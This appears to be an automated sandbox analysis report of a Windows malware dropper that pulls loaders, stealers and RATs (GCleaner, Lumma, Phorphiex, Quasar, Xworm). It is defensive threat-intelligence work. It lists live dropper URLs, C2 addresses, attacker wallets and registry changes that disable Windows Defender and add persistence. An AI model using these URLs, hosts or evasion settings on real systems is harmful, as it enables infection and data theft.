gcleaner | a87292de990133b944754dcf27f76de727ec4a52033ea408d942b0ba16e968f9

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Size

12KB
MD5

55dba6e7aa4e8cc73415f4e3f9f6bdae
SHA1

87c9f29d58f57a5e025061d389be2655ee879d5d
SHA256

3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
SHA512

f2eb91e812b2ba58c4309fd44edadc8977367c7d9d6214d7e70a0392ae8427d570746ae57cca68dc260901f664f2e8c6c5387118ff01d243abeb5680abe2a352
SSDEEP

192:vnpYaU28zxHdo4ZMgQl9q+4ua7HhdSbwxz1ULU87glpK/b26J4Uf1XXr5:vWZdoWMR96uaLhM6ULU870gJR

Score

10^/10

gcleaner lumma phorphiex quasar rhadamanthys risepro xworm bootkit evasion loader persistence rat spyware stealer trojan vmprotect worm

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe

Extracted

Family

gcleaner

185.172.128.90

5.42.65.64

Attributes

url_path
/advdlc.php

Extracted

Family

phorphiex

http://185.215.113.66/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv

rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb

48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw

bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3

bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3

Extracted

Family

lumma

https://appliedgrandyjuiw.shop/api

https://birdpenallitysydw.shop/api

https://cinemaclinicttanwk.shop/api

https://disagreemenywyws.shop/api

https://speedparticipatewo.shop/api

https://fixturewordbakewos.shop/api

https://colorprioritytubbew.shop/api

https://abuselinenaidwjuew.shop/api

https://methodgreenglassdatw.shop/api

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe	family_xworm

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3"	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe

Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe	family_quasar

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

RegAsm.exe

description pid process target process

PID 5572 created 2524 5572 RegAsm.exe sihost.exe

description	pid	process	target process
PID 5572 created 2524	5572	RegAsm.exe	sihost.exe

Windows security bypass 2 TTPs 18 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

http185.215.113.66newtpp.exe.exe1002628022.exe2770021532.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	1002628022.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

http185.215.113.46costrandom.exe.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ http185.215.113.46costrandom.exe.exe
Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

109 2548 powershell.exe
148 5844 powershell.exe
152 6088 powershell.exe
155 2316 powershell.exe
174 5888 powershell.exe
199 5696 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5456 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	http185.215.113.46costrandom.exe.exe

flow	pid	process
109	2548	powershell.exe
148	5844	powershell.exe
152	6088	powershell.exe
155	2316	powershell.exe
174	5888	powershell.exe
199	5696	powershell.exe

pid	process
5456	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

http185.215.113.46costrandom.exe.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	http185.215.113.46costrandom.exe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	http185.215.113.46costrandom.exe.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exehttpguatemalacayerealestate.combatushkainte.exe.exehttpsfile-drop.ccD5d2a75Tester.exe.exehttpsfile-drop.ccD24e534svchost.exe.exe3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	httpguatemalacayerealestate.combatushkainte.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	httpsfile-drop.ccD5d2a75Tester.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	httpsfile-drop.ccD24e534svchost.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe

Drops startup file 2 IoCs

Processes:

httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3297cda814fb30a725f976420f48da21.exe	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3297cda814fb30a725f976420f48da21.exe	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe

Executes dropped EXE 36 IoCs

Processes:

http185.215.113.66newtpp.exe.exehttpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exehttp185.215.113.66pei.exe.exehttp185.196.8.137tesgs.exe.exehttpguatemalacayerealestate.combatushkainte.exe.exehttpra-ftp.ruimages1.jpg.exehttp185.215.113.46negravegan.exe.exehttp185.215.113.46costrandom.exe.exe3013831348.exehttproundcube.custommarinesvcs.comklounada.exe.exe1002628022.exe2770021532.exehttpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exehttpfiles.offshore.catfxYvCG6c.exe.exe275354733.exehttpfiles.offshore.catDSKeOWN1.exe.exehttpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exehttpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe1793913919.exeRuntimeBroker2.exe667029277.exe$embr-client.exe2321415439.exeRuntimeBroker2.exe3216420798.exehttp88.218.61.2191234.exe.exehttp185.172.128.59ISetup8.exe.exehttp185.172.128.59ISetup2.exe.exehttpsfile-drop.ccD5d2a75Tester.exe.exehttpsfile-drop.ccD24e534svchost.exe.exehttp88.218.61.2191111.exe.exehttp88.218.61.219test2.exe.exehttpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exehttp88.218.61.219555.exe.exesvchost.exesvchost.exe

pid	process
1968	http185.215.113.66newtpp.exe.exe
3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
2724	http185.215.113.66pei.exe.exe
3580	http185.196.8.137tesgs.exe.exe
3076	httpguatemalacayerealestate.combatushkainte.exe.exe
4552	httpra-ftp.ruimages1.jpg.exe
3728	http185.215.113.46negravegan.exe.exe
3528	http185.215.113.46costrandom.exe.exe
884	3013831348.exe
780	httproundcube.custommarinesvcs.comklounada.exe.exe
3824	1002628022.exe
3928	2770021532.exe
4336	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
5300	httpfiles.offshore.catfxYvCG6c.exe.exe
5488	275354733.exe
5580	httpfiles.offshore.catDSKeOWN1.exe.exe
5868	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5036	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5180	1793913919.exe
4320	RuntimeBroker2.exe
5244	667029277.exe
1608	$embr-client.exe
4584	2321415439.exe
3088	RuntimeBroker2.exe
3840	3216420798.exe
5824	http88.218.61.2191234.exe.exe
5876	http185.172.128.59ISetup8.exe.exe
5284	http185.172.128.59ISetup2.exe.exe
5680	httpsfile-drop.ccD5d2a75Tester.exe.exe
6124	httpsfile-drop.ccD24e534svchost.exe.exe
4956	http88.218.61.2191111.exe.exe
5964	http88.218.61.219test2.exe.exe
2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
4960	http88.218.61.219555.exe.exe
5580	svchost.exe
3076	svchost.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

http185.215.113.46costrandom.exe.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Wine http185.215.113.46costrandom.exe.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Wine	http185.215.113.46costrandom.exe.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe	vmprotect
behavioral2/memory/780-223-0x0000000000020000-0x000000000090E000-memory.dmp	vmprotect
behavioral2/memory/780-222-0x0000000000020000-0x000000000090E000-memory.dmp	vmprotect

Windows security modification 2 TTPs 26 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

http185.215.113.66newtpp.exe.exe1002628022.exehttpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe2770021532.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	1002628022.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	2770021532.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	http185.215.113.66newtpp.exe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	1002628022.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	2770021532.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	http185.215.113.66newtpp.exe.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

http185.215.113.66newtpp.exe.exe1002628022.exe2770021532.exehttpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysdinrdvs.exe"	http185.215.113.66newtpp.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe"	1002628022.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe"	1002628022.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe"	2770021532.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe"	2770021532.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3297cda814fb30a725f976420f48da21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe\" .."	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysdinrdvs.exe"	http185.215.113.66newtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\3297cda814fb30a725f976420f48da21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe\" .."	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

httpra-ftp.ruimages1.jpg.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 httpra-ftp.ruimages1.jpg.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

http185.215.113.46costrandom.exe.exe

pid process

3528 http185.215.113.46costrandom.exe.exe

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	httpra-ftp.ruimages1.jpg.exe

pid	process
3528	http185.215.113.46costrandom.exe.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

httpfiles.offshore.catfxYvCG6c.exe.exepowershell.exe$embr-client.exe

description	pid	process
PID 5300 set thread context of 0	5300	httpfiles.offshore.catfxYvCG6c.exe.exe
PID 4776 set thread context of 5572	4776	powershell.exe	RegAsm.exe
PID 1608 set thread context of 0	1608	$embr-client.exe

Drops file in Windows directory 13 IoCs

Processes:

powershell.exepowershell.exehttpsfile-drop.ccD5d2a75Tester.exe.exe1002628022.exe2770021532.exepowershell.exepowershell.exepowershell.exehttp185.215.113.66newtpp.exe.exe

description	ioc	process
File created	C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe	powershell.exe
File opened for modification	C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe	powershell.exe
File opened for modification	C:\Windows\svchost.exe	httpsfile-drop.ccD5d2a75Tester.exe.exe
File opened for modification	C:\Windows\syspplsvc.exe	1002628022.exe
File created	C:\Windows\winakrosvsa.exe	2770021532.exe
File created	C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe	powershell.exe
File created	C:\Windows\svchost.exe	httpsfile-drop.ccD5d2a75Tester.exe.exe
File created	C:\Windows\syspplsvc.exe	1002628022.exe
File opened for modification	C:\Windows\winakrosvsa.exe	2770021532.exe
File created	C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe	powershell.exe
File created	C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe	powershell.exe
File created	C:\Windows\sysdinrdvs.exe	http185.215.113.66newtpp.exe.exe
File opened for modification	C:\Windows\sysdinrdvs.exe	http185.215.113.66newtpp.exe.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3888	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
1456	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
2124	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
2636	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
2256	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
3632	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
4448	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
3928	3076	WerFault.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
5484	5572	WerFault.exe	RegAsm.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5688 schtasks.exe
5832 schtasks.exe
6112 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

5560 timeout.exe
3348 timeout.exe
6024 timeout.exe
5972 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4336 taskkill.exe

pid	process
5688	schtasks.exe
5832	schtasks.exe
6112	schtasks.exe

pid	process
5560	timeout.exe
3348	timeout.exe
6024	timeout.exe
5972	timeout.exe

pid	process
4336	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exehttp185.215.113.46costrandom.exe.exepowershell.exepowershell.exehttproundcube.custommarinesvcs.comklounada.exe.exepowershell.exepowershell.exepowershell.exehttpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exepowershell.exepowershell.exepowershell.exepowershell.exehttpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exepowershell.exehttpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
3528	http185.215.113.46costrandom.exe.exe
3528	http185.215.113.46costrandom.exe.exe
2548	powershell.exe
2548	powershell.exe
2548	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
780	httproundcube.custommarinesvcs.comklounada.exe.exe
780	httproundcube.custommarinesvcs.comklounada.exe.exe
4776	powershell.exe
4776	powershell.exe
4776	powershell.exe
4652	powershell.exe
4652	powershell.exe
4652	powershell.exe
1576	powershell.exe
1576	powershell.exe
4336	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
4336	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
1912	powershell.exe
1912	powershell.exe
2256	powershell.exe
2256	powershell.exe
1912	powershell.exe
2256	powershell.exe
5384	powershell.exe
5384	powershell.exe
5500	powershell.exe
5500	powershell.exe
5384	powershell.exe
5500	powershell.exe
5868	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5868	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5844	powershell.exe
5844	powershell.exe
5036	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5036	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
5844	powershell.exe
5572	RegAsm.exe
5572	RegAsm.exe
5888	dialer.exe
5888	dialer.exe
5888	dialer.exe
5888	dialer.exe
6088	powershell.exe
6088	powershell.exe
6088	powershell.exe
5684	powershell.exe
5684	powershell.exe
5684	powershell.exe
2788	powershell.exe
2788	powershell.exe
2316	powershell.exe
2316	powershell.exe
2788	powershell.exe
2316	powershell.exe
5888	powershell.exe
5888	powershell.exe
5888	powershell.exe
5696	powershell.exe
5696	powershell.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

1002628022.exe

pid process

3824 1002628022.exe

pid	process
3824	1002628022.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

